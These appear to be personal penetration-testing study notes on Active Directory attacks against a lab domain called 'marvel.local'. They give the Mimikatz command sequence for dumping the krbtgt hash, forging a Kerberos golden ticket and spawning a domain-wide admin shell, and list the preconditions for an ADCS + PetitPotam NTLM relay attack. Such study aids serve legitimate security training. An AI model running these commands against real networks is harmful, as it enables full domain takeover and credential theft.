Golden Tickets
- assume the domain controller has been compromised
- create a golden ticket
background
- complete access to the whole domain
- mimikatz
- lsadump::lsa /inject /name:krbtgt
- copy domain s-id
- copy primary NTLM
- kerberos::golden /User:Administrator /Domain:marvel.local /sid:SID /krbtgt:HASH /id:500 /ptt
- misc::cmd
- now I have a shell that I could use for psexec for all computers in the domain
- TODO: what is a silver ticket?
- TODO: howto extract golden ticket to client?
usage
ADCS + PetitPotam NTLM Relay = GoldenTicket
Below are some of the conditions making an AD environment vulnerable to ADCS + NTLM relay attack:
- ADCS is configured to allow NTLM authentication;
- NTLM authentication is not protected by EPA or SMB signing;
- ADCS is running either of these services:
- Certificate Authority Web Enrollment
- Certificate Enrollment Web Service